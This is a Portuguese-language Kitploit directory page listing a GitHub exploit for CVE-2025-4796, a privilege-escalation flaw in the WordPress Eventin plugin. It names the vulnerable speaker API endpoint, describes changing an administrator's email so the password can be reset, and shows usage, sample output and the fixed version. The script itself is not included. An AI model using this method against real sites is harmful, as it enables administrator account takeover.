Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-4796 — eventin <= 4.0.34 - escalada de privilégio via alteração de e-mail do usuário / tomada de conta para contribuidor autenticado+ | Kitploit
Ferramentas/GitHubGitHub/anothersec/cve-2025-4796
Escalada de PrivilégiosAtaques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubanothersec/cve-2025-4796

CVE-2025-4796

eventin <= 4.0.34 - escalada de privilégio via alteração de e-mail do usuário / tomada de conta para contribuidor autenticado+

Ver Repositório
11há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-4796

eventin <= 4.0.34 - escalonamento de privilégios via alteração de e-mail de usuário / assunção de conta para contribuidor autenticado+

descrição

Bug de escalonamento de privilégios no plugin WordPress eventin (<= 4.0.34) que permite que qualquer contribuidor ou usuário de nível superior altere o e-mail de qualquer usuário através da API de atualização de palestrantes do plugin. Ao alterar o e-mail de um administrador para um controlado pelo atacante, eles podem redefinir a senha e assumir a conta.

  • parte vulnerável: plugin WordPress eventin (eventin\speaker\api\speakercontroller::update_item)
  • versões afetadas: <= 4.0.34
  • cve: CVE-2025-4796
  • cvss: 8.8 (alto)

detalhes da vulnerabilidade

O eventin não verifica adequadamente quem está solicitando a atualização ou se tem permissão para alterar o e-mail do usuário. Um contribuidor ou superior pode chamar este endpoint:

  • put /wp-json/eventin/v2/speakers/<speaker_id> e atualizar o e-mail do palestrante para um e-mail que eles controlam. Então o atacante pode usar a redefinição de senha do WordPress para assumir a conta do administrador.

requisitos:

  • python 3.8 ou superior
  • requests

instalar requests: pip install requests

uso

execute o script e insira os valores solicitados quando for perguntado:

python3 CVE-2025-4796.py

exemplo de saída

[+] turning off ssl verification warnings
[+] login into wordpress.
[+] login successful.
[+] fetching nonce token
[+] nonce token found: abcdef1234567890
[+] update request for speaker email

[+] update operation successful.

root@kitploit:~
url: http://example.com  
id: 123   
email: [email protected]. 
user: attacker  
pass: yourpassword  

{. 
  "id": 123,    
  "email": "[email protected]",  
  "name": "Speaker Name",    
  ...  
}. 

mitigação

A correção foi lançada na versão 4.0.35 do plugin eventin. Os administradores do site são fortemente aconselhados a atualizar para esta versão imediatamente. A correção inclui verificações adicionais de validação do usuário na função SpeakerController::update_item

Baixar ferramenta